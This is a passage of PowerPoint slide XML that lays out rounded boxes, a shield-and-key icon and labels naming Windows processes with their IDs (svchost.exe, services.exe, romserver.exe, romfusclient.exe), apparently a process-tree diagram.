                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12677845" y="914400"/>
                <a:ext cx="3068060" cy="834390"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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svchost.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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(2968)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="78" name="Graphic 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9F9A52-8549-6163-46CD-531955CFE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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10770007" y="743785"/>
              <a:ext cx="295718" cy="284766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Graphic 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0407508-20AD-CBF5-87C1-5F45E9197F4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11485450" y="1908018"/>
            <a:ext cx="300198" cy="300198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="Group 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2D5666-2920-FEDA-1D6F-9BF35F99D193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9149680" y="-67586"/>
            <a:ext cx="3233300" cy="834390"/>
            <a:chOff x="12512605" y="914400"/>
            <a:chExt cx="3233300" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Rounded Rectangle 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F718BE-1A46-ED48-5985-DDE9265C1CDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12512605" y="1103018"/>
              <a:ext cx="2850810" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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89" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C71C4FA-892F-3FFF-8C28-EA930FA6C452}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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services.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(1380)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Graphic 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B006D3-A873-4F4E-4549-A3CB5EC5649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14413558" y="2530855"/>
            <a:ext cx="300198" cy="300198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="95" name="Group 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B37F9605-9B9B-F446-2C42-9D1FA81A8916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10401615" y="1287479"/>
            <a:ext cx="3850374" cy="468180"/>
            <a:chOff x="12764717" y="1315360"/>
            <a:chExt cx="3850374" cy="468180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0223809-4811-A943-A883-14DB0782C47E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12764717" y="1315360"/>
              <a:ext cx="3850374" cy="468180"/>
              <a:chOff x="12454313" y="1103018"/>
              <a:chExt cx="3850374" cy="468180"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="83" name="Rounded Rectangle 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7713D532-0F92-A7D9-E69E-283876BF8F48}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12454313" y="1103018"/>
                <a:ext cx="3850374" cy="468180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4">
                      <a:alpha val="80000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent3">
                      <a:alpha val="80000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
                <a:tileRect/>
              </a:gradFill>
              <a:ln cap="rnd">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:schemeClr val="accent4">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:glow>
                <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="D80B55"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" defTabSz="1371600"/>
                <a:endParaRPr lang="en-SK" sz="2000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="IntelOne Display Regular"/>
                  <a:cs typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A631CE3-3FD1-DE81-32ED-B762859CDCCF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13098177" y="1103018"/>
                <a:ext cx="3068060" cy="467642"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln cap="rnd">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:schemeClr val="accent4">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:glow>
                <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="D80B55"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" defTabSz="1371600"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1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romserver.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000">
                    <a:solidFill>
                      <a:schemeClr val="bg1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(15920)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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1DA3FBF7-B8F4-F93E-7919-A91E54A6BC9B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12985434" y="1406246"/>
              <a:ext cx="259864" cy="299855"/>
              <a:chOff x="14027225" y="3493572"/>
              <a:chExt cx="1160569" cy="1339172"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="Freeform 91">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1854317-8EB2-951D-8C82-B6DDBD1D4589}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14518214" y="3850697"/>
                <a:ext cx="178590" cy="178538"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                  <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                  <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                  <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                  <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                  <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                  <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                  <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                    <a:moveTo>
                      <a:pt x="178590" y="89243"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="178590" y="138572"/>
                      <a:pt x="138624" y="178538"/>
                      <a:pt x="89295" y="178538"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39966" y="178538"/>
                      <a:pt x="0" y="138572"/>
                      <a:pt x="0" y="89243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="39966"/>
                      <a:pt x="39966" y="0"/>
                      <a:pt x="89295" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138624" y="0"/>
                      <a:pt x="178590" y="39966"/>
                      <a:pt x="178590" y="89243"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="13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SK"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="93" name="Freeform 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{131A5742-3150-0164-9F40-9437E5388C57}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14027225" y="3493572"/>
                <a:ext cx="1160569" cy="1339172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                  <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                  <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                  <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                  <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                  <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                  <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                  <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                  <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                  <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                  <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                  <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                  <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                  <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                  <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                  <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                  <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                  <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                  <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                  <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                  <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                  <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                  <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                  <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                  <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                  <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                  <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                  <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                  <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                  <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                  <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                  <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                  <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                  <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                  <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                  <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                  <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                  <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                  <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                  <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                  <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                  <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                  <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                  <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                  <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                  <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                  <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                  <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                  <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                  <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                  <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                  <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                  <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                  <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                  <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                  <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                  <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                  <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                  <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                  <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                    <a:moveTo>
                      <a:pt x="580284" y="267885"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="481679" y="267885"/>
                      <a:pt x="401748" y="347764"/>
                      <a:pt x="401748" y="446422"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="401748" y="529434"/>
                      <a:pt x="458453" y="599531"/>
                      <a:pt x="535664" y="619147"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="535664" y="982032"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="535664" y="1006566"/>
                      <a:pt x="555751" y="1026653"/>
                      <a:pt x="580284" y="1026653"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="714200" y="1026653"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="738734" y="1026653"/>
                      <a:pt x="758821" y="1006566"/>
                      <a:pt x="758821" y="982032"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="957499"/>
                      <a:pt x="738734" y="937411"/>
                      <a:pt x="714200" y="937411"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="624905" y="937411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624905" y="848116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714200" y="848116"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="738734" y="848116"/>
                      <a:pt x="758821" y="828029"/>
                      <a:pt x="758821" y="803495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="778962"/>
                      <a:pt x="738734" y="758875"/>
                      <a:pt x="714200" y="758875"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="624905" y="758875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624905" y="619147"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="702116" y="599542"/>
                      <a:pt x="758821" y="529439"/>
                      <a:pt x="758821" y="446422"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="347764"/>
                      <a:pt x="678943" y="267885"/>
                      <a:pt x="580284" y="267885"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="580284" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="671776" y="32590"/>
                      <a:pt x="776241" y="63873"/>
                      <a:pt x="892737" y="89295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="988728" y="110272"/>
                      <a:pt x="1078441" y="124552"/>
                      <a:pt x="1160569" y="133916"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1160569" y="477112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148262" y="479597"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1087004" y="505507"/>
                      <a:pt x="1044021" y="566163"/>
                      <a:pt x="1044021" y="636859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1054473" y="688631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1024168" y="694750"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="962910" y="720660"/>
                      <a:pt x="919927" y="781316"/>
                      <a:pt x="919927" y="852012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="919927" y="899143"/>
                      <a:pt x="939031" y="941811"/>
                      <a:pt x="969917" y="972698"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="978998" y="978821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977587" y="979106"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="916329" y="1005016"/>
                      <a:pt x="873346" y="1065672"/>
                      <a:pt x="873346" y="1136368"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="880413" y="1171373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811434" y="1223714"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="780645" y="1243791"/>
                      <a:pt x="748183" y="1261812"/>
                      <a:pt x="714200" y="1277544"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="580284" y="1339172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446368" y="1277544"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="174559" y="1151677"/>
                      <a:pt x="0" y="879345"/>
                      <a:pt x="0" y="579401"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="133916"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="82131" y="124553"/>
                      <a:pt x="171841" y="110272"/>
                      <a:pt x="267832" y="89295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="384325" y="63819"/>
                      <a:pt x="488793" y="32590"/>
                      <a:pt x="5802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SK"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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FD02EB31-162E-8E3A-30EE-533BC362D9BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11440205" y="2435443"/>
            <a:ext cx="4112969" cy="468180"/>
            <a:chOff x="12764716" y="1315360"/>
            <a:chExt cx="4112969" cy="468180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AE564896-759E-12D6-5D54-BD718ECE2A20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12764716" y="1315360"/>
              <a:ext cx="4112969" cy="468180"/>
              <a:chOff x="12454312" y="1103018"/>
              <a:chExt cx="4112969" cy="468180"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="Rounded Rectangle 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23753E32-1EFB-CD2D-57EA-08672BC0CBF1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12454312" y="1103018"/>
                <a:ext cx="4112969" cy="468180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4">
                      <a:alpha val="80000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent3">
                      <a:alpha val="80000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
                <a:tileRect/>
              </a:gradFill>
              <a:ln cap="rnd">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:schemeClr val="accent4">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:glow>
                <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="D80B55"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" defTabSz="1371600"/>
                <a:endParaRPr lang="en-SK" sz="2000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="IntelOne Display Regular"/>
                  <a:cs typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="102" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E345CE-76C8-D09F-D86F-CA4752839020}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13229060" y="1103018"/>
                <a:ext cx="3068060" cy="467642"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln cap="rnd">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:schemeClr val="accent4">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:glow>
                <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="D80B55"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" defTabSz="1371600"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1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romfusclient.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000">
                    <a:solidFill>
                      <a:schemeClr val="bg1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(16440)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p: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A3840C53-A474-7DD6-62F5-B455B29A65F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12985434" y="1406246"/>
              <a:ext cx="259864" cy="299855"/>
              <a:chOff x="14027225" y="3493572"/>
              <a:chExt cx="1160569" cy="1339172"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="99" name="Freeform 98">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5C05BD5-53B7-E5F1-ED24-40023A34105F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14518214" y="3850697"/>
                <a:ext cx="178590" cy="178538"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                  <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                  <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
